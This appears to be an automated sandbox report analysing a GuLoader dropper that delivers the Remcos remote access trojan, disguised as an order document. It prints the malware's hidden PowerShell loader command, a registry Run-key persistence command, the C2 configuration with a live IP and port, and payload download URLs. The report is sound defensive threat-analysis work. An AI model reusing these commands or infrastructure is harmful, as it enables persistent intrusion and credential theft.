
Windows Analysis Report
Company Profile and new order-202401127.scr.exe

Overview

General Information

Sample name: Company Profile and new order-202401127.scr.exe
Analysis ID: 1568022
MD5: 935bdb714d2c6a118e9c6bfd941084b8
SHA1: 817f3f195d61d459fbbdac24e5a4f014d927edcf
SHA256: c69b2064c89c254dbeda8f204b3a60ab753816ddff618be9d593cb9839cfe09d
Tags: exe, GuLoader, scr, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Company Profile and new order-202401127.scr.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe" MD5: 935BDB714D2C6A118E9C6BFD941084B8)
    • powershell.exe (PID: 1856 cmdline: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 1996 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 6520 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • msiexec.exe (PID: 528 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5228 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1440 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["185.29.10.213:63650:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NJ8CFR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: msiexec.exe PID: 1292 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", ParentImage: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ParentProcessId: 2992, ParentProcessName: Company Profile and new order-202401127.scr.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", ProcessId: 1856, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loaded
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1996, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ProcessId: 6520, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.13.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1292, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49807
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1292, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ProcessId: 1996, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", ParentImage: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ParentProcessId: 2992, ParentProcessName: Company Profile and new order-202401127.scr.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", ProcessId: 1856, ProcessName: powershell.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 19 A8 76 ED 73 96 AF D9 EB E6 7A FC DD 5D 21 02 21 F9 0B 34 DC EA 73 F5 BA 62 D5 F0 1D 96 56 42 01 86 3D C4 20 90 FF 5C A5 83 9D DA F3 86 93 3F 35 BA 59 91 4F 0C 29 4C 88 64 D6 CD A7 B3 2A 89, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-NJ8CFR\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T06:37:15.606210+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49825 | 185.29.10.213 | 63650 | TCP
2024-12-04T06:37:20.590561+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49840 | 185.29.10.213 | 63650 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T06:37:18.211477+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49835 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T06:37:09.081442+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49807 | 104.21.13.139 | 443 | TCP

AV Detection

Source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["185.29.10.213:63650:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NJ8CFR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Company Profile and new order-202401127.scr.exe | Virustotal: Detection: 13%
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: Company Profile and new order-202401127.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: Company Profile and new order-202401127.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_22F510F1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F56580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,6_2_22F56580
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\nonopposable\

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49825 -> 185.29.10.213:63650
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49840 -> 185.29.10.213:63650
Source: Malware configuration extractor | IPs: 185.29.10.213
Source: global traffic | TCP traffic: 192.168.2.5:49825 -> 185.29.10.213:63650
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.21.13.139
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: DATACLUB-SE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49835 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49807 -> 104.21.13.139:443
Source: global traffic | HTTP traffic detected:
    GET /data-package/a8AChfye/download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: filetransfer.io
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /storage/download/Yo8ryWgWZnzn HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: s25.filetransfer.io
    Connection: Keep-Alive
    Cookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /data-package/a8AChfye/download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: filetransfer.io
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /storage/download/Yo8ryWgWZnzn HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: s25.filetransfer.io
    Connection: Keep-Alive
    Cookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: filetransfer.io
Source: global traffic | DNS traffic detected: DNS query: s25.filetransfer.io
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307649031.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2854804372.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2851800069.0000000006BF8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2859815808.0000000006BF8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2859447513.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2856857118.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2813327763.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2879060126.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2878820778.0000000006C07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp;
Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpD
Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpN
Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpZ
Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpxe
